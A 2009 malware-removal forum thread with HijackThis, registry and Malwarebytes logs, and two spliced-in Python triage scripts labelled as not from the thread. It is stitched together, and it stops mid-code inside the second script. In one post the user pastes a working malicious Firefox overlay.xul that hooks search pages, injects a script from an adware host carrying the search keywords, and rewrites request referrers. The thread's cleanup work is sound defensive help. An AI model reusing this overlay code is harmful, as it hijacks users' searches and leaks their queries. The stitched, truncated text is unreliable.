Thread: Prunnet + BHOs = My computer is suffering - Help!

  1. #21
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Redirects

    I was still having redirects after all that! I loaded Comodo Internet Suite and it found 30 things! I quarantined them all. I also ran CCleaner and did the registry scan.

    Also, IE loaded when I restarted my computer and Comodo had a popup that said something like "Comodo is learning : Internet Explorer alters the key XYZ123 (I don't remember what it was)". That may be because I stopped some of my startup programs in Spybot. Too bad you can't just uninstall IE!

    I took some screenshots because I wasn't sure how to get text files from these things.
    Files Quarantined by Comodo:


    CCleaner Registry - Morpheus Toolbar? I never had one. I did use Morpheus for a while, but never used a toolbar:


    Here is an example of redirects: I opened the search results in new tabs, and you can see what I got instead! Other common ones are Yahoo HotJobs, CowSurvey, various antivirus sites, various search sites, etc...


    Actually, this is pretty typical: if I load 5 search results into tabs, 4 will be bogus and one will be something I actually clicked on.

    Don't know if this helps, but here is an updated HJT:

    Logfile of Trend Micro HijackThis v2.0.2
    Scan saved at 10:26:53 AM, on 2/14/2009
    Platform: Windows XP SP3 (WinNT 5.01.2600)
    MSIE: Internet Explorer v7.00 (7.00.6000.16791)
    Boot mode: Normal

    Running processes:
    C:\WINDOWS\System32\smss.exe
    C:\WINDOWS\system32\winlogon.exe
    C:\WINDOWS\system32\services.exe
    C:\WINDOWS\system32\lsass.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
    C:\WINDOWS\system32\svchost.exe
    C:\Program Files\Ahead\InCD\InCDsrv.exe
    C:\WINDOWS\system32\svchost.exe
    C:\WINDOWS\system32\LEXBCES.EXE
    C:\WINDOWS\system32\spoolsv.exe
    C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
    C:\WINDOWS\Explorer.EXE
    C:\WINDOWS\system32\ctfmon.exe
    C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
    C:\WINDOWS\system32\EloSrvce.exe
    C:\Program Files\Java\jre6\bin\jqs.exe
    C:\Program Files\Google\Update\GoogleUpdate.exe
    C:\Program Files\LogMeIn\x86\RaMaint.exe
    C:\WINDOWS\system32\EloDkMon.exe
    C:\Program Files\LogMeIn\x86\LogMeIn.exe
    C:\WINDOWS\system32\EloTTray.exe
    C:\Program Files\LogMeIn\x86\LMIGuardian.exe
    C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    C:\Program Files\LogMeIn\x86\LogMeInSystray.exe
    C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
    C:\Program Files\Microsoft LifeCam\MSCamS32.exe
    C:\Program Files\LogMeIn\x86\LMIGuardian.exe
    C:\WINDOWS\system32\nvsvc32.exe
    C:\Program Files\COMODO\COMODO Internet Security\cfp.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\Program Files\Google\Google Talk\googletalk.exe
    C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    C:\WINDOWS\system32\pctspk.exe
    C:\WINDOWS\system32\HPZipm12.exe
    C:\WINDOWS\System32\svchost.exe
    C:\WINDOWS\system32\UAService7.exe
    C:\Program Files\Canon\CAL\CALMAIN.exe
    C:\WINDOWS\system32\rundll32.exe
    C:\Program Files\Mozilla Firefox\firefox.exe
    C:\WINDOWS\system32\wuauclt.exe
    C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
    O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
    O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
    O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\Program Files\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
    O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
    O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
    O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
    O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
    O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
    O4 - HKLM\..\Run: [COMODO Internet Security] "C:\Program Files\COMODO\COMODO Internet Security\cfp.exe" -h
    O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
    O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
    O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
    O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
    O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk.disabled
    O4 - Startup: OpenOffice.org 2.4.lnk.disabled
    O4 - Global Startup: Acrobat Assistant.lnk.disabled
    O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
    O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
    O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
    O4 - Global Startup: Device Detector 2.lnk.disabled
    O4 - Global Startup: Device Detector 3.lnk.disabled
    O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
    O4 - Global Startup: Microsoft Office.lnk.disabled
    O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
    O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
    O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
    O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
    O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
    O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
    O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
    O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
    O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
    O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
    O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
    O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
    O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
    O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
    O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
    O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcafee.com/molbin/sh...3/mcinsctl.cab
    O16 - DPF: {664088B0-6AF3-4514-AF9D-A0DC3A3DF24A} (F-Secure Online Scanner 3.3) - http://support.f-secure.com/ols3beta/fscax.cab
    O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yaho...tocomplete.cab
    O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} - http://download.mcafee.com/molbin/sh...26/mcgdmgr.cab
    O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
    O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
    O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
    O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
    O23 - Service: COMODO Internet Security Helper Service (cmdAgent) - Unknown owner - C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
    O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
    O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
    O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
    O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
    O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
    O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
    O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
    O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
    O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
    O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
    O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
    O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
    O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe

    --
    End of file - 10286 bytes

  2. #22
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Another Question - Nuclear Option?

    [Note: I also have another reply above this one]

    Would this work:
    1. Purchase a new SATA HD (1TB is cheap these days!!)
    2. Take out my current drives (IDE)
    3. Load Windows
    4. Then re-insert my current drives as secondary (slave) drives and copy desired files onto the new C drive.
    5. Format the old drives.


    Would the new C drive just get infected straight away?
    Or does the infection need to be on C in order to work?

    Or am I getting ahead of myself?

  3. #23
    Emeritus - Security Expert peku006
    Join Date
    Feb 2007
    Location
    Norway
    Posts
    3,103


    Hi drrchrds

    I restarted my computer and Comodo had a popup that said something like "Comodo is learning
    Please read this

    Files Quarantined by Comodo:
    a lot of files in the System Restore, and they are not active...

    I do not know why you have this
    C:\Program Files\Sibelius Software 3 \Keygen.exe

    All of them ("Heur.Packed") are legitimate programs. I do not know why Comodo has moved them to quarantine.

    CCleaner removes only empty registry values
    Registry Cleaners, not recommended

    Open Notepad.
    Copy the text from the box to an empty file.
    Save it as export.bat to your desktop.
    Choose save as all types
    Code:
    regedit /e C:\look.txt "HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32"
    Close Notepad.

    Locate Export.bat on your Desktop and double-click on it. It will create a file called look.txt in C:\
    Copy the entire text and paste it into your reply here in this topic.

    Thanks peku006
    Last edited by peku006; 2009-02-15 at 10:01.
    I don't help with logs thru PM. If you have problems create a thread in the forum, please.
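As an added example (not from the thread), the script below reads the look.txt that the batch file above produces and flags Drivers32 mappings that deserve a second look. The sample export is constructed, and the heuristics (expected value-name families, codec module extensions, module paths inside the Windows directory) are assumptions rather than an official allow-list.

```python
# Added example (not from the thread): triage the look.txt that the
# "regedit /e ... drivers32" batch file writes. Heuristics are assumptions.
import re
from pathlib import PureWindowsPath

# Constructed sample in the format regedit /e writes (a real export is UTF-16LE:
# open it with encoding="utf-16" before calling report). The midi9 and aux9
# lines are made up to show what a suspicious mapping looks like.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"midimapper"="midimap.dll"
"msacm.msg711"="msg711.acm"
"vidc.iv31"="C:\\WINDOWS\\system32\\ir32_32.dll"
"wave"="wdmaud.drv"
"midi9"="C:\\WINDOWS\\Temp\\qwxfh.dll"
"aux9"="C:\\Documents and Settings\\User\\hook.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server\RDP]
"wave"="rdpsnd.dll"
"MaxBandwidth"=dword:000056b9
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
# Value-name families Windows XP itself registers under Drivers32 (assumption).
NAME_RE = re.compile(
    r'^(?:midimapper|wavemapper|msvideo\d*|(?:wave|midi|mixer|aux)\d*'
    r'|vidc\..+|msacm\..+)$', re.I)
CODEC_EXTS = {'.dll', '.drv', '.acm', '.ax'}
# Directories a mapping given as a full path is expected to live in.
EXPECTED_DIRS = {'c:\\windows', 'c:\\windows\\system32'}

def parse_reg(text):
    """Return {key: {name: data}} from .reg text; string data is unescaped."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('Windows Registry Editor'):
            continue
        m = KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if data.startswith('"') and data.endswith('"'):
                # .reg escapes backslash and quote with a leading backslash
                data = re.sub(r'\\(.)', r'\1', data[1:-1])
            current[re.sub(r'\\(.)', r'\1', name)] = data
    return keys

def triage(entries):
    """Return [(name, data, reason)] for mappings that deserve a closer look."""
    findings = []
    for name, data in entries.items():
        if data.startswith(('dword:', 'hex')):
            continue  # numeric settings such as MaxBandwidth are not mappings
        path = PureWindowsPath(data)
        if not NAME_RE.match(name):
            reason = 'value name outside the usual Drivers32 families'
        elif path.suffix.lower() not in CODEC_EXTS:
            reason = 'module is not a codec/driver file type'
        elif '\\' in data and str(path.parent).lower() not in EXPECTED_DIRS:
            reason = 'full path outside the Windows directory'
        else:
            continue
        findings.append((name, data, reason))
    return findings

def report(text):
    """Map each exported key to its findings; keys with none are omitted."""
    out = {}
    for key, entries in parse_reg(text).items():
        findings = triage(entries)
        if findings:
            out[key] = findings
    return out
```

A mapping that passes these checks is not proven clean; the point is to shorten the list of entries you look up by hand.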

  4. #24
    Junior Member
    Join Date
    Feb 2009
    Location
    Hendersonville, NC
    Posts
    15

    Reg and MBAM and redirect script found in Firefox folder

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "midimapper"="midimap.dll"
    "msacm.imaadpcm"="imaadp32.acm"
    "msacm.msadpcm"="msadp32.acm"
    "msacm.msg711"="msg711.acm"
    "msacm.msgsm610"="msgsm32.acm"
    "msacm.trspch"="tssoft32.acm"
    "vidc.cvid"="iccvid.dll"
    "VIDC.I420"="msh263.drv"
    "vidc.iv31"="C:\\WINDOWS\\system32\\ir32_32.dll"
    "vidc.iv32"="C:\\WINDOWS\\system32\\ir32_32.dll"
    "VIDC.IYUV"="iyuv_32.dll"
    "vidc.mrle"="msrle32.dll"
    "vidc.msvc"="msvidc32.dll"
    "VIDC.UYVY"="msyuv.dll"
    "VIDC.YUY2"="msyuv.dll"
    "VIDC.YVU9"="tsbyuv.dll"
    "VIDC.YVYU"="msyuv.dll"
    "wavemapper"="msacm32.drv"
    "msacm.msg723"="msg723.acm"
    "vidc.M263"="msh263.drv"
    "vidc.M261"="msh261.drv"
    "msacm.msaudio1"="msaud32.acm"
    "msacm.sl_anet"="sl_anet.acm"
    "msacm.l3acm"="C:\\WINDOWS\\System32\\l3codeca.acm"
    "vidc.DIVX"="divx.dll"
    "wave"="wdmaud.drv"
    "midi"="wdmaud.drv"
    "mixer"="wdmaud.drv"
    "vidc.ir41"="C:\\WINDOWS\\System32\\ir41_32.ax"
    "msacm.iac2"="C:\\WINDOWS\\System32\\iac25_32.ax"
    "vidc.iv50"="ir50_32.dll"
    "vidc.iv41"="ir41_32.ax"
    "msacm.voxacm160"="vct3216.acm"
    "VIDC.SP53"="SP5X_32.DLL"
    "VIDC.SP54"="SP5X_32.DLL"
    "VIDC.SP55"="SP5X_32.DLL"
    "VIDC.SP56"="SP5X_32.DLL"
    "VIDC.SP57"="SP5X_32.DLL"
    "VIDC.SP58"="SP5X_32.DLL"
    "VIDC.SP59"="SP5X_32.DLL"
    "MSVideo"="vfwwdm32.dll"
    "MSVideo8"="VfWWDM32.dll"
    "wave1"="wdmaud.drv"
    "mixer1"="wdmaud.drv"
    "wave2"="wdmaud.drv"
    "mixer2"="wdmaud.drv"
    "wave3"="wdmaud.drv"
    "mixer3"="wdmaud.drv"
    "midi1"="KORGUMDD.DRV"
    "wave4"="wdmaud.drv"
    "midi2"="wdmaud.drv"
    "mixer4"="wdmaud.drv"
    "aux"="wdmaud.drv"
    "wave5"="wdmaud.drv"
    "midi3"="wdmaud.drv"
    "mixer5"="wdmaud.drv"
    "aux1"="wdmaud.drv"
    "wave6"="wdmaud.drv"
    "mixer6"="wdmaud.drv"
    "vidc.VP60"="vp6vfw.dll"
    "vidc.VP61"="vp6vfw.dll"
    "vidc.VP62"="vp6vfw.dll"
    "VIDC.XVID"="xvidvfw.dll"
    "VIDC.YV12"="yv12vfw.dll"
    "msacm.ac3acm"="ac3acm.acm"
    "msacm.lameacm"="lameACM.acm"
    "VIDC.FFDS"="ff_vfw.dll"
    "wave7"="wdmaud.drv"
    "midi4"="wdmaud.drv"
    "mixer7"="wdmaud.drv"
    "aux2"="wdmaud.drv"
    "wave8"="wdmaud.drv"
    "midi5"="wdmaud.drv"
    "mixer8"="wdmaud.drv"
    "aux3"="wdmaud.drv"
    "wave9"="wdmaud.drv"
    "mixer9"="wdmaud.drv"
    "msacm.siren"="sirenacm.dll"

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server]

    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server\RDP]
    "wave"="rdpsnd.dll"
    "MaxBandwidth"=dword:000056b9
    "wavemapper"="msacm32.drv"
    "EnableMP3Codec"=dword:00000001
    "midimapper"="midimap.dll"

    ------------------------------------------------------------------
    I ran Malwarebytes again; it still found Vundo.

    Malwarebytes' Anti-Malware 1.34
    Database version: 1763
    Windows 5.1.2600 Service Pack 3

    2/15/2009 8:55:01 AM
    mbam-log-2009-02-15 (08-55-01).txt

    Scan type: Full Scan (C:\|E:\|H:\|)
    Objects scanned: 358867
    Time elapsed: 5 hour(s), 25 minute(s), 0 second(s)

    Memory Processes Infected: 0
    Memory Modules Infected: 0
    Registry Keys Infected: 1
    Registry Values Infected: 0
    Registry Data Items Infected: 1
    Folders Infected: 0
    Files Infected: 0

    Memory Processes Infected:
    (No malicious items detected)

    Memory Modules Infected:
    (No malicious items detected)

    Registry Keys Infected:
    HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{6d794cb4-c7cd-4c6f-bfdc-9b77afbdc02c} (Trojan.Vundo) -> Quarantined and deleted successfully.

    Registry Values Infected:
    (No malicious items detected)

    Registry Data Items Infected:
    HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel\Homepage (Hijack.Homepage) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

    Folders Infected:
    (No malicious items detected)

    Files Infected:
    (No malicious items detected)


    ----------------------------------------------------------------------
    FYI: This is the redirect script. I found 2 copies called overlay.xul in the Firefox folder, both created within 1 minute of the time I got Vundo. I encrypted this file with AxCrypt so that I could undo it if I had to, and I replaced it with a blank version with the same name. Result: no more redirects:


    <overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
    <script type="application/x-javascript" >
    window.addEventListener("load", function() { xulRef.init(); }, false);
    window.addEventListener("load", initRequestObserver, false);
    var xulRef = {
        init:
        function(){
            var appcontent = document.getElementById("appcontent");
            if(appcontent){
                appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
            }
        },
        onPageLoad:
        function(aEvent){
            var doc = aEvent.originalTarget;
            var loc = doc.location.href;
            var ref = doc.referrer;
            var keyword = '';
            var engine ;
            var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&amp;s=3&amp;v=icv270109ff&amp;e=";

            if( loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'google';
            // } else if(loc.match(/search\.ua.+[&amp;\?]q=([^&amp;]*)/)){
            // keyword = RegExp.$1;
            } else if ( loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'yahoo';
            } else if(loc.match(/altavista\.com.*results[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'altavista';
            } else if(loc.match(/alltheweb\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'alltheweb';
            } else if(loc.match(/search\.netscape\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'netscape';
            } else if(loc.match(/search\.aol\.com.*search[&amp;\?].*query=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'aol';
            } else if(loc.match(/ask\.com.*web[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'ask';
            } else if(loc.match(/search\.com.*search[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'searchcom';
            } else if(loc.match(/search\.lycos\.com.*[&amp;\?].*query=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'lycos';
            } else if(loc.match(/nova\.rambler\.ru.*search[&amp;\?].*query=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'rambler';
            } else if(loc.match(/gogo\.ru.*go[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'gogo';
            } else if(loc.match(/meta\.ua.*search.asp[&amp;\?]q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'meta';
            //} else if(loc.match(/au\.ru.*searchPhrase=([^&amp;]*)/)){
            // keyword = RegExp.$1;
            } else if(loc.match(/all\.by.*search.*[&amp;\?]query=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'allby';
            // } else if(loc.match(/uaport\.net.*UAcatalog[/][&amp;\?].*query=([^&amp;]*)/)){
            // keyword = RegExp.$1;
            } else if(loc.match(/search\.msn\.com.*results.*[&amp;\?].*q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'msn';
            } else if(loc.match(/search\.live\.com.*results.*[&amp;\?]q=([^&amp;]*)/)){
                keyword = RegExp.$1;
                engine = 'live';
            };

            if( keyword.length > 0 ){
                var script = window.content.document.createElement('script');
                script.id = "js_0";
                script.src = __d + engine + '&amp;q=' + keyword;
                doc.getElementsByTagName('head')[0].appendChild(script);
            }
        }
    };
    function initRequestObserver() {
        var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
        observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
    }

    var httpRequestObserver = {
        observe:
        function(subject, topic, data) {
            if(topic == "http-on-modify-request") {
                var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
                var pos = subject.URI.spec.indexOf("&amp;rf=http");
                if(pos > -1) {
                    var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
                    httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
                }
            }
        }
    };

    </script>
    </overlay>



    -----------------------------------------------------------------
    Lastly, thanks for the tip about registry cleaners.
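The overlay above does three things at once: it registers an observer on every outgoing HTTP request, rewrites the Referer of requests that carry an rf= marker, and injects a remote script into search-result pages. As an added example (not from the thread), the Python triage script below parses an overlay.xul, pulls the inline script out of the XUL namespace, and reports those indicators together with the hosts the script contacts and the search engines it hooks; the overlays it runs on are constructed, with a placeholder feed URL.

```python
# Added example (not from the thread): static triage of a Firefox overlay.xul
# for the redirect behaviour shown above. The overlays below are constructed;
# the feed URL is a placeholder.
import re
import xml.etree.ElementTree as ET

XUL_NS = 'http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul'

# Mirrors the structure of the posted overlay: a request observer, a Referer
# rewrite and a remote <script> injected into search-result pages.
SAMPLE_OVERLAY = r'''<overlay id="sample-overlay"
  xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
window.addEventListener("load", initRequestObserver, false);
var feed = "http://redirector.invalid/ffjs.php?e=";  // placeholder host
function onPageLoad(aEvent) {
  var doc = aEvent.originalTarget, loc = doc.location.href, keyword = '';
  if (loc.match(/google\..+\/search.*[&amp;\?]q=([^&amp;]*)/)) { keyword = RegExp.$1; }
  else if (loc.match(/search\.yahoo.*search.*[&amp;\?]p=([^&amp;]*)/)) { keyword = RegExp.$1; }
  if (keyword.length > 0) {
    var s = doc.createElement('script');
    s.src = feed + keyword;
    doc.getElementsByTagName('head')[0].appendChild(s);
  }
}
function initRequestObserver() {
  Components.classes["@mozilla.org/observer-service;1"]
    .getService(Components.interfaces.nsIObserverService)
    .addObserver(httpRequestObserver, "http-on-modify-request", false);
}
var httpRequestObserver = { observe: function(subject, topic, data) {
  var ch = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
  ch.referrer = newRef;
} };
</script>
</overlay>'''

# A harmless overlay that only relabels a menu, for comparison.
BENIGN_OVERLAY = r'''<overlay id="menu-overlay"
  xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript">
window.addEventListener("load", function() {
  document.getElementById("tools-menu").setAttribute("label", "Tools");
}, false);
</script>
</overlay>'''

# (indicator id, regex over the decoded script text, what it does to the user)
INDICATORS = [
    ('http_observer', r'addObserver\s*\([^)]*"http-on-modify-request"',
     'observes every outgoing HTTP request'),
    ('referrer_rewrite', r'\.referrer\s*=(?!=)', 'rewrites the Referer header'),
    ('remote_script_inject', r"createElement\s*\(\s*['\"]script['\"]\s*\)",
     'injects a <script> element into loaded pages'),
    ('url_pattern_match', r'\.match\s*\(/', 'pattern-matches page URLs'),
]
ENGINES = ('google', 'yahoo', 'altavista', 'alltheweb', 'netscape', 'aol',
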